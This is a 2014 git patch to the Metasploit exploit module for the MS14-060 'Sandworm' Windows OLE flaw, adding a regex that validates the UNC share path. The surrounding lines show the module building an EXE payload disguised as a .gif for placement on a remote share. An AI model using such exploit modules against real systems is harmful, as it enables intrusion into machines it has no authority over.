From 8fa648744c41a86d4c37b872a74e40f799ac99c6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 17 Oct 2014 13:46:13 -0500
Subject: [PATCH] Add @wchen-r7's unc regex

---
 .../windows/fileformat/ms14_060_sandworm.rb      | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
index 9b04d52917..cb5313d3e9 100644
--- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
+++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
@@ -81,7 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @unc = datastore['UNCPATH']
+    @unc = validate_unc_path
+
+    if @unc.nil?
+      fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
+    end
 
     print_status("Creating the EXE payload...")
     payload_name = "#{rand_text_alpha(4)}.gif"
@@ -104,6 +108,16 @@ class Metasploit3 < Msf::Exploit::Remote
     print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
   end
 
+  def validate_unc_path
+    if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/
+      unc = datastore['UNCPATH']
+    else
+      unc = nil
+    end
+
+    unc
+  end
+
   def my_file_create(data, name)
     ltype = "exploit.fileformat.#{self.shortname}"
     path = store_local(ltype, nil, data, name)